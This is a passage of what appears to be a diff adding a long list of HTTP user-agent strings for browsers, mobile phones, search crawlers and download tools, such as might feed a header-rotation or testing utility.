AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 +Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre +Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 +Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 +Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre +Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0 +Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1 +Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9 +Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15 +Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 +Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko +Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025 +Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1 +Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020 +Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) 
+Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 +Mozilla/5.0 (X11; U; Linux i686; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.0.5603M +Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 +Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 +Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) 
Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0 +Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) 
Gecko Epiphany/1.2.5 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14 +Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15 +Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3 +Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) +Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; +Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) +Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu) +Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0 +Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11 +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 
2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12 +Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) +Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp) +Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm) +Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) 
AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 
5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 +Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 +NetSurf/1.2 (NetBSD; amd64) +Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 +Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 +Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0 +NokiaN70-1/5.0609.2.0.1 Series60/2.8 
Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 +Offline Explorer/2.5 +Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30 +Opera/7.50 (Windows ME; U) [en] +Opera/7.50 (Windows XP; U) +Opera/7.51 (Windows NT 5.1; U) [en] +Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr) +Opera/9.0 (Macintosh; PPC Mac OS X; U; en) +Opera/9.20 (Macintosh; Intel Mac OS X; U; en) +Opera/9.25 (Windows NT 6.0; U; en) +Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) +Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1 +Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en) +Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0 +Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 +Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 +Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0 +Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00 +Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 +Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10 +Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 +Opera/9.80 
(Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00 +Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; FreeBSD 8.1-RELEASE i386; Edition Next) Presto/2.12.388 Version/12.10 +Opera/9.80 (X11; Linux i686) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 +P3P Validator +POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1 +POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 +Peach/1.01 (Ubuntu 8.04 LTS; U; en) +Python-urllib/2.5 +SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 +SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) +SEC-SGHX210/1.0 UP.Link/6.3.1.13.0 +SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SearchExpress +SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 
+SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT100/R101 +SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0 +SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT68/R201A +SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US] +SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0 +SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SuperBot/4.4.0.60 (Windows XP) +UCWEB/8.8 (SymbianOS/9.2; U; en-US; NokiaE63) AppleWebKit/534.1 UCBrowser/8.8.0.245 Mobile +UCWEB/8.8 (iPhone; CPU OS_6; en-US)AppleWebKit/534.1 U3/3.0.0 Mobile +User agent: Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36 +Uzbl (Webkit 1.3) (Linux i686 [i686]) +Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 +W3C_Validator/1.305.2.12 libwww-perl/5.64 +W3C_Validator/1.654 +WDG_Validator/1.6.2 +Web Downloader/6.9 +WebCopier v4.6 +WebZIP/3.5 (http://www.spidersoft.com) +Wget/1.9 cvs-stable (Red Hat modified) +Wget/1.9.1 +everyfeed-spider/2.0 (http://www.everyfeed.com) +facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/9.0.2 (Windows; N) +iTunes/9.0.3 (Macintosh; U; Intel 
